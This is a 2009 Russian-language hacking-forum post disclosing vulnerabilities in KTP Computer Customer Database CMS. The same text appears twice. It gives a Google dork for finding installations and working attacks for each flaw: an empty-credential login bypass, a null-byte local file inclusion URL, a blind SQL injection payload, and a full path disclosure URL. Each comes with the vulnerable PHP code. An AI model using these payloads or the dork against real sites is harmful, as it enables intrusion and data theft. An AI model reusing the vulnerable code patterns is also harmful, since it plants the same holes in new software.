Dimi4
12.04.2009, 21:12
Уязвимости KTP Computer Customer Database CMS
Product : KTP Computer Customer Database CMS
Dork : "KTPCCD & KTPotG ©2008 Keith Thibodeaux"
Site: http://sourceforge.net/project/showfiles.php?group_id=245189
Founded by: Dimi4
Date : 12.04.09
Auth bypass
[pages/login.php]
Вот такая вот корявая функция. Проверяет только пароль:
if ($_GET['a'] == "login") {
$lname = $_POST['lname'];
$lpass = md5($_POST['lpass']);
$q = mysql_query("SELECT * FROM techs WHERE tloginname = '$lname'");
$result = mysql_fetch_array($q);
if ($lpass == $result['tloginpass']) {
$_SESSION['tid'] = $result['tid'];
$_SESSION['loggedin'] = "1";
$_SESSION['tname'] = $result['tfname'] . " " . $result['tlname'];
$lin = 1;
$template->assign('name', $_SESSION['tname']);
$template->assign('id', $_SESSION['tid']);
$template->assign('func', "in");
$template->display('login.tpl');
} else {
echo "login failed";
}
Логинимся с пустыми логином и паролем.
Local File Include
[index.php]
if (isset($_GET['p'])) {
include 'pages/' . $_GET['p'] . '.php';
} else {
include 'pages/index.php';
}
http://localhost/ktp/?p={PATH}%00
Blind SQL-inj
[index.php]
function gettech($tid) {
if ($result = mysql_query("SELECT * FROM techs WHERE tid = '$tid'")) {
$tech = mysql_fetch_array($result);
return $tech;
} else {
echo mysql_error();
}
}
http://localhost/ktp/?p=tech&a=vtech&tid=1'+and+substring(@@version,1,1)=[num]--
Full Path Disclosure
[index.php]
http://localhost/ktp/pages/tech/changepassword.php
Product : KTP Computer Customer Database CMS
Dork : "KTPCCD & KTPotG ©2008 Keith Thibodeaux"
Site: http://sourceforge.net/project/showfiles.php?group_id=245189
Founded by: Dimi4
Date : 12.04.09
Auth bypass
[pages/login.php]
Вот такая вот корявая функция. Проверяет только пароль:
if ($_GET['a'] == "login") {
$lname = $_POST['lname'];
$lpass = md5($_POST['lpass']);
$q = mysql_query("SELECT * FROM techs WHERE tloginname = '$lname'");
$result = mysql_fetch_array($q);
if ($lpass == $result['tloginpass']) {
$_SESSION['tid'] = $result['tid'];
$_SESSION['loggedin'] = "1";
$_SESSION['tname'] = $result['tfname'] . " " . $result['tlname'];
$lin = 1;
$template->assign('name', $_SESSION['tname']);
$template->assign('id', $_SESSION['tid']);
$template->assign('func', "in");
$template->display('login.tpl');
} else {
echo "login failed";
}
Логинимся с пустыми логином и паролем.
Local File Include
[index.php]
if (isset($_GET['p'])) {
include 'pages/' . $_GET['p'] . '.php';
} else {
include 'pages/index.php';
}
http://localhost/ktp/?p={PATH}%00
Blind SQL-inj
[index.php]
function gettech($tid) {
if ($result = mysql_query("SELECT * FROM techs WHERE tid = '$tid'")) {
$tech = mysql_fetch_array($result);
return $tech;
} else {
echo mysql_error();
}
}
http://localhost/ktp/?p=tech&a=vtech&tid=1'+and+substring(@@version,1,1)=[num]--
Full Path Disclosure
[index.php]
http://localhost/ktp/pages/tech/changepassword.php